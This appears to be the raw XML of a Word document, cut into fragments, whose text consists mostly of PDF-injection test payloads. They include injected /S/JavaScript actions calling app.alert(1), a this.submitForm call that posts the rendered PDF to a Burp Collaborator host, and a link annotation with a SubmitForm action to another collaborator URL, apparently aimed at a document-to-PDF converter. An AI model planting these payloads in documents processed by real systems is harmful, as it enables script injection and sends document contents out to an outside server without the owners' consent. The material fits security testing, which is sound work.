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00" w:rsidRDefault="00F80730">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w: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/blah)&gt;&gt;/A&lt;&lt;/S/JavaScript/</w:t>
      </w:r>
      <w:proofErr w:type="gram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JS(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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app.alert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(1);)/Type/Action&gt;&gt;/&gt;&gt;(</w:t>
      </w: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/blah)&gt;&gt;/A&lt;&lt;/S/JavaScript/</w:t>
      </w:r>
      <w:proofErr w:type="gram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JS(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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app.alert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(1);</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80730">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/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this.submitForm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({</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80730">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/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cURL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: 'https://your-id.burpcollaborator.net',</w:t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cSubmitAs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: 'PDF'}))</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80730">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w: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/Type/Action&gt;&gt;/&gt;&gt;(</w:t>
      </w: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/blah)&gt;&gt;/A&lt;&lt;/S/JavaScript/</w:t>
      </w:r>
      <w:proofErr w:type="gram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JS(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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app.alert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(1)</w:t>
      </w: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/)/S/JavaScript/</w:t>
      </w:r>
      <w:proofErr w:type="gram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JS(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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app.alert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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F80730" w:rsidRDefault="00F80730">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w:rsidR="00F80730" w:rsidRPr="00F80730" w:rsidRDefault="00F80730">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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/) &gt;&gt; &gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80730">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w: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&lt;&lt;/Type /</w:t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Annot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 xml:space="preserve"> /Subtype /Link /</w:t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Rect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 xml:space="preserve"> [0.00 813.54 566.93 -298.27] /Border [0 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80730">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r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0] /A &lt;&lt;/S/</w:t>
      </w:r>
      <w:proofErr w:type="spell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SubmitForm</w:t>
      </w:r>
      <w:proofErr w:type="spell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/Flags 0/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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F(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F80730">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://pf85kanro3jxap35lphj8pgudljc72vr.burpcollaborator.net/test/test.docx</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00F80730" w:rsidRPr="00F8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30"/>
    <w:rsid w:val="005C7700"/>
    <w:rsid w:val="00F8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4E051-1F2F-45F7-938D-239B84BC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bimbombonjoli</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bimbombonjoli</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-28T19:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-28T19:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>